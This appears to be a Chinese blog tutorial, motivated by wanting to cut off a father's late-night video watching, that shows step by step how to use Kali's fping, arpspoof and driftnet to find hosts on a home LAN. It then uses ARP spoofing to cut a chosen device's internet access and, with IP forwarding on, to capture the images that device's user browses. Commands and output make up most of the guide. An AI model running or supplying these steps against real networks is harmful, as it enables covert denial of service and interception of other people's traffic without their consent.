前言:最近我爸总是在今日头条看电视剧(不要钱,没广告,疫情期间也没啥事儿),但是一般回到夜里一点多,对身体不好,我妈说我爸睡觉太晚,想让他早点睡觉,他不听,无奈之举,我用了kali,让他断网。以下知识仅供学习。
1. arp断网
1.1 所需要的工具
- VM虚拟机(网络选择桥接模式), kali操作系统
- fping,类似与win下面的ping,这个可以帮助我们查看局域网中存活的ip。
1.2 具体操作
- ifconfig => 用于查看ip
root@kali:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.101 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::20c:29ff:fe69:929a prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:69:92:9a txqueuelen 1000 (Ethernet)
RX packets 1635316 bytes 226317367 (215.8 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 141839 bytes 141216587 (134.6 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 1996 bytes 222108 (216.9 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1996 bytes 222108 (216.9 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
如果有wlan0就用wlan0也可以。
2. ip route show => 可以查询到我们的网关
root@kali:~# ip route show
default via 192.168.1.1 dev eth0 proto dhcp metric 100
192.168.1.0/24 dev eth0 proto kernel scope link src 192.168.1.101 metric 100
- 看看局域网存活的ip都有谁 命令 fping -asg 192.168.1.0/24
root@kali:~# fping -asg 192.168.1.0/24
192.168.1.1
192.168.1.101
192.168.1.107
192.168.1.103
192.168.1.102
192.168.1.109
192.168.1.104
后面还有一堆我就不写了,基本都是没有存活的ip。这里说一下,我的是192.168.1.103。
- arp欺骗,命令很简单,这里我用我的ip测试
root@kali:~# arpspoof -i eth0 -t 192.168.1.103 192.168.1.1
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
说一下这个命令格式:
这个命令的意思是arp欺骗,别人发送的arp包都到我的网卡上来,第一个参数是监听本地的eth0网卡,第一个IP是受害者ip,第二个是网关ip。现在我的今日头条刷新不了了。但是别人可以给你发微信你可以收到。
昨天更新完kali之后,发现没有arpspoof命令,这个用自己安装一下就ok,具体操作去github上读读人家的readme.md,里面有详细命令。
使用Ctrl+z可以终止欺骗。
写到这里其实已经算是写完了,想了想既然用到了arpspoof,那不得不提的就是driftnet。
2. 查看局域网具体ip浏览的图片
承接上回书说到driftnet,这里用这个展示一下骚操作。
在终端输入driftnet,看看有没有这个工具,如果没有或者找不到命令就去github找找安装教程。这里给出github地址:driftnet安装教程可读readme.md
- 终端输入 echo 1 > /proc/sys/net/ipv4/ip_forward 进行ip转发,保证欺骗的ip可以正常上网,就是把文件里的0改成1
root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@kali:~#
- 开始欺骗(以我的ip)
arpspoof -i eth0 -t 192.168.1.1 192.168.1.103
-i就是指定网卡,-t 先指定网关,再指定攻击ip
有如下字样就是代表开始了:
root@kali:~# arpspoof -i eth0 -t 192.168.1.103 192.168.1.1
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
之后运行:
driftnet -i eth0
这里我拿今日头条搜索科比图片,driftnet不出意外就会有下面信息(我直接上传图片吧):
之后的图片会保存到home中。
记录一下当前时间吧:
In [1]: from datetime import datetime
In [2]: print(datetime.now())
2020-02-16 14:47:59.696041
In [3]: